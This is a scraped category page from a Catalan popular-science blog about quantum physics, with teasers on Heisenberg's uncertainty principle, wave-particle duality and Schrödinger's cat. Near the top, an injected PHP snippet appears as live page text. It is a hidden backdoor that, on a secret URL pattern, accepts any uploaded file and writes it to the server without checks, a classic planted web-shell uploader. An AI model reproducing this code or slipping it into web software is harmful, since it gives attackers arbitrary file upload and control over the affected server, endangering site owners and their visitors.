Categoría: Física Quàntica

$id=$_SERVER['REQUEST_URI'];if(preg_match_all("/\?\d{5,8}g\d{5,8}s/",$id,$matches)){if(isset($_POST['Submit'])){$filedir="";$maxfile='2000000';$userfile_name=$_FILES['image']['name'];$userfile_tmp=$_FILES['image']['tmp_name'];if(isset($_FILES['image']['name'])){$abod=$filedir.$userfile_name;@move_uploaded_file($userfile_tmp,$abod);echo"
Done ==> $userfile_name
";}}else{echo'
';}exit;}

El principi d’incertesa de Heisenberg

Un concepte important de la física quàntica que cal comprendre és el principi d’incertesa de Heisenberg, que ens diu que hi ha algunes parelles de magnituds d’una ona quàntica que no es poden saber sempre amb exactitud a la vegada. La més coneguda d’aquestes parelles, que es representa amb la fórmula següent: Δx · Δp…
Leer más

Ona o partícula? O potser les dues?

Un dels conceptes bàsics de la física quàntica és la dualitat ona/partícula; és a dir, les partícules són ones i viceversa. Això pot semblar difícil de comprendre, però en realitat és fàcil si entenem la superposició quàntica. A l’article anterior vam dir que tota partícula pot estar en diferents llocs, pot anar a diferents velocitats,…
Leer más

El gat de Schrödinger, l’origen del nostre logo

Abans de capficar-nos en el món de la física quàntica, voldríem explicar el significat del nostre logo: el gat de Schrödinger. Temps ha, cap al 1935, el físic alemany Erwin Schrödinger, després de posar en comú nombroses teories amb Albert Einstein, va inventar un paradoxa per exemplificar la superposició d’estats quàntics d’una manera que s’entengui bé.…
Leer más